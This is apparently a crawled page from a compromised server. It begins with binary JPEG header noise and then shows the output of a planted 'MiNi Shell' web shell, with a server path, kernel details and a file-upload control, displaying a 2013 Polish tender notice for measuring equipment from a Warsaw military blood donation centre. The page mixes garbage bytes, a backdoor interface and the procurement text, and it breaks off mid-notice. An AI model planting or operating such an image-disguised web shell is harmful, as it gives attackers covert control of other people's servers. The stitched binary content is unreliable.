JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130821/337278-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa urządzeń pomiarowych</b><br>
<b>Numer ogłoszenia: 337278 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SP ZOZ , ul. Koszykowa 78, 00-671 Warszawa, woj. mazowieckie, tel. 022 6 845 557, faks 022 6 845 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń pomiarowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1: Aparat do pomiaru pH
wielkość zamówienia: 1 sztuka.
Pakiet nr 2: Waga szalkowa
wielkość zamówienia: 1 sztuka.
Pakiet nr 3: Odważnik wzorcowy 500g
wielkość zamówienia: 2 sztuki.
Pakiet nr 4: Odważnik wzorcowy 200g
wielkość zamówienia: 1 sztuka.
Pakiet nr 5: Termometr elektroniczny z przewodem
Wielkość zamówienia: 18 sztuk.
Pakiet nr 6: 
Poz. 1: Elektroniczny rejestrator temperatury
Poz. 2: Zestaw oprogramowania z interfejsem umożliwiającym wczytanie danych z 
wielkość zamówienia: 
poz. 1: 1 sztuka
poz. 2: 1 sztuka
Pakiet nr 7: Aparat do pomiaru ciśnienia tętniczego zegarowy
wielkość zamówienia: 2 sztuki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.30.00.00-8, 42.92.31.10-6, 42.95.80.00-6, 38.41.20.00-6, 31.64.40.00-2, 38.42.30.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dokumentów określonych w arkuszu asortymentowo-cenowym, stanowiącym Załącznik Nr 4/1, 4/2, 4/5, 4/6, 4/7 do SIWZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w razie zaistnienia okoliczności:
1.	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;
2.	zaistnienie sytuacji pozwalającej na obniżenie kosztów realizacji zamówienia (np. zmniejszenie zakresu robót lub czynności, zastosowania alternatywnych rozwiązań technologicznych);
3.	wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
4.	zmiana w zakresie przedmiotu zamówienia w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili podpisania umowy, niezależnych od wykonawcy;
5.	zmiana terminu realizacji umowy w przypadku wystąpienia okoliczności nieleżących po stronie wykonawcy;
6.	ustawowej zmiany stawki podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa, 
Samodzielny Publiczny Zakład Opieki Zdrowotnej, 
ul. Koszykowa 78, 
00-671 Warszawa 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 09:00, miejsce: Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa, 
Samodzielny Publiczny Zakład Opieki Zdrowotnej, 
ul. Koszykowa 78, 
00-671 Warszawa 1, 
Kancelaria ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Aparat do pomiaru pH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE
2.	Umożliwia pomiar pH składników krwi i cieczy o temperaturach do 30 st.C, 
3.	Umożliwia pomiar w zakresie 0.0 do 14.0 pH, o rozdzielczości 0.01 pH i dokładności plus-minus 0.01 pH,
4.	Zapewnia szybką stabilizację wyniku,
5.	Zapewnia automatyczną kompensację temperatury,
6.	Posiada obudowę wykonaną z materiału odpornego na środki dezynfekcyjne, korozję i promienie UV,
7.	Posiada wymienną elektrodę pH metryczną,
8.	Posiada wyświetlacz, na którym prezentowany jest aktualny wynik pomiaru,
9.	Umożliwia kalibrację dwupunktową,  z wykrywaniem wartości pH 3 buforów (4.00; 7.00; 9.22),
10.	Zasilanie prądem zmiennym  230V.
11.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
12.	Wykonawca zapewnia bezpłatną instalację, uruchomienie i bezpłatne szkolenie personelu w zakresie obsługi urządzenia, zakończonego podpisaniem protokołu przekazania nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez Zamawiającego.
13.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
14.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim.
15.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
16.	W okresie gwarancji Wykonawca zobowiązuje się do minimum 2 bezpłatnych przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego
17.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
18.	Czas naprawy na terenie Polski 7 dni.
19.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
20.	Wykonawca zapewni bezpłatną walidację instalacyjną.
Wymagane w ofercie dokumenty: 
1.	deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE,
2.	instrukcja w języku polskim,
3.	specyfikacja techniczna producenta zaoferowanego powyżej urządzenia
wielkość zamówienia: 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.30.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Waga szalkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE,
2.	Posiada świadectwo legalizacji,
3.	Waga szalkowa mechaniczna wykonana z metalu,
4.	Posiada dwie szalki stalowe malowane proszkowo,
5.	Obciążenie maksymalne 1 kg,
6.	Obciążenie minimalne 10g,
7.	Granica błędów: 2g na wartość działki legalizacyjnej e [g]
8.	Średnica szalek fi 152 mm
9.	Klasa dokładności III
10.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
11.	Wykonawca zapewnia bezpłatną instalację, uruchomienie i bezpłatne szkolenie personelu w zakresie obsługi urządzenia, zakończonego podpisaniem protokołu przekazania nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez Zamawiającego.
12.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
13.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim oraz świadectwo legalizacji
14.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
15.	W okresie gwarancji Wykonawca zobowiązuje się do minimum 2 bezpłatnych przeglądów gwarancyjnych (2 razy w odstępie 12 miesięcy).
16.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
17.	Czas naprawy na terenie Polski 7 dni.
18.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
Wymagane w ofercie dokumenty: 
1.	deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE,
2.	instrukcja w języku polskim,
3.	specyfikacja techniczna producenta zaoferowanego powyżej urządzenia
4.	świadectwo legalizacji  
wielkość zamówienia: 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.92.31.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odważnik wzorcowy 500g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE
2.	Odważnik wzorcowy o wadze 500 g
3.	Klasa M2
4.	Posiada świadectwo wzorcowania wydane przez Urząd Miar
5.	Wykonany z stali magnetycznej niklowanej
6.	Dokładność ( błąd graniczny ) plus-minus 0,03 g
7.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego
8.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim oraz świadectwo wzorcowania
9.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie
wielkość zamówienia: 2 sztuki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.95.80.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odważnik wzorcowy 200g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE
2.	Odważnik wzorcowy o wadze 200 g
3.	Klasa M2
4.	Posiada świadectwo wzorcowania wydane przez Urząd Miar
5.	Wykonany z stali magnetycznej niklowanej
6.	Dokładność ( błąd graniczny ) plus-minus 0,03 g
7.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego
8.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim oraz świadectwo wzorcowania
9.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie
wielkość zamówienia: 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.95.80.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Termometr elektroniczny z przewodem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE
2.	Urządzenie jest fabrycznie nowe
3.	Termometr elektroniczny na baterie z czujnikiem zewnętrznym połączonym z urządzeniem kablem o długości minimum 1 metra,
4.	Posiada wyświetlacz pokazujący bieżące wartości pomiaru,
5.	Umożliwia prowadzenie długotrwałego pomiaru, z odczytem temperatury wewnętrznej w zakresie od minus 40 st.C do plus 30 st.C, z rozdzielczością 0,1 st.C, 
6.	Kabel łączący urządzenie z czujnikiem o średnicy nie powodującej rozszczelnienia uszczelek urządzeń chłodniczych jest plastyczny i odporny na nacisk,
7.	Posiada solidną obudowę zabezpieczającą przed wilgocią i uszkodzeniami mechanicznymi, 
8.	Minimalna żywotność baterii: 12 miesięcy.
9.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
10.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
11.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim.
12.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
13.	W okresie gwarancji Wykonawca zobowiązuje się do minimum 2 bezpłatnych przeglądów gwarancyjnych (2 razy w odstępie 12 miesięcy).
14.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
15.	Czas naprawy na terenie Polski 7 dni.
16.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
Wymagane w ofercie dokumenty: 
1.	deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE,
2.	specyfikacja techniczna producenta zaoferowanego powyżej urządzenia.
Wielkość zamówienia: 18 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Elektroniczny rejestrator temperatury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 1: Elektroniczny rejestrator temperatury
Poz. 2: Zestaw oprogramowania z interfejsem umożliwiającym wczytanie danych z rejestratora do PC
1.	Posiada znak CE
2.	Urządzenie fabrycznie nowe
3.	Elektroniczny, dwukanałowy rejestrator temperatury
4.	Posiada dwa kanały zewnętrzne
5.	Posiada dwie zanurzeniowe sondy temperatury o zakresie pomiaru: minus 40 st.C plus40 st.C i I klasie dokładności pomiaru i wymiarach: długość co najmniej 15 cm, średnica 3 mm, na cienkim, spłaszczonym przewodzie o długości co najmniej 3 m
6.	Musi posiadać certyfikat wzorcowania dla każdej sondy w 2 punktach pomiarowych: : minus 40 st.C i plus 40 st.C
7.	Posiada wyświetlacz i opcję wydruku
8.	Umożliwia programowanie kroku pomiarowego i ustawienie wartości granicznych
9.	Dokładność pomiaru: co najmniej plus-minus 0,8 st.C
10.	Posiada instrukcję obsługi w języku polskim
11.	Oprogramowanie kompatybilne z Windows XP, WIN 7, WIN 8
12.	Posiada pamięć wewnętrzną: min. 10 000 wartości
13.	Zasilany baterią o czasie pracy: min.1 rok.
14.	Posiada zabezpieczenie zapobiegające utracie danych w przypadku wyczerpania się lub wymiany baterii
15.	Posiada solidną obudowę zabezpieczającą przed wilgocią i uszkodzeniami mechanicznymi
16.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
17.	Wykonawca zapewnia bezpłatną instalację, uruchomienie i bezpłatne szkolenie personelu w zakresie obsługi urządzenia, zakończonego podpisaniem protokołu przekazania nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez Zamawiającego.
18.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
19.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim oraz certyfikat wzorcowania.
20.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
21.	W okresie gwarancji Wykonawca zobowiązuje się do minimum 2 bezpłatnych przeglądów gwarancyjnych (2 razy w odstępie 12 miesięcy).
22.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
23.	Czas naprawy na terenie Polski 7 dni.
24.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
Wymagane w ofercie dokumenty: 
1.	deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE,
2.	specyfikacja techniczna producenta zaoferowanego powyżej urządzenia.
wielkość zamówienia:
poz. 1: 1 sztuka
poz. 2: 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.64.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Aparat do pomiaru ciśnienia tętniczego zegarowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Posiada znak CE.
2.	Urządzenie jest fabrycznie nowe.
3.	Ciśnieniomierz zegarowy, przenośny ze stetoskopem lekarskim,
4.	Posiada instrukcję obsługi w języku polskim,
5.	Posiada legalizację Głównego Urzędu Miar,
6.	Umożliwia pomiar ciśnienia tętniczego krwi w zakresie: 0 do 300 mmHg,
7.	Posiada solidny mankiet zapinany na rzepy, pompowany powietrzem za pomocą lateksowej gruszki z zaworkiem,
8.	Zawór spustowy jest chromowany, trwały, z możliwością regulacji.
9.	Wykonawca zapewnia autoryzowany serwis na terenie Polski.
10.	Wykonawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego.
11.	Wykonawca dostarcza wraz z urządzeniem instrukcję obsługi w języku polskim.
12.	Wykonawca udziela minimum 24 miesiące gwarancji na urządzenie.
13.	Czas reakcji serwisu w okresie gwarancji nie przekracza 48 godzin.
14.	Czas naprawy na terenie Polski 7 dni.
15.	Na czas naprawy powyżej 7 dni Wykonawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym.
16.	Wykonawca w okresie gwarancji  przeprowadzi minimum 2 bezpłatne przeglądy serwisowe (2 razy w odstępie 12 miesięcy).
Wymagane w ofercie dokumenty: 
1.	deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE,
2.	instrukcja w języku polskim,
wielkość zamówienia: 2 sztuki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.30.00-6.</p></li>
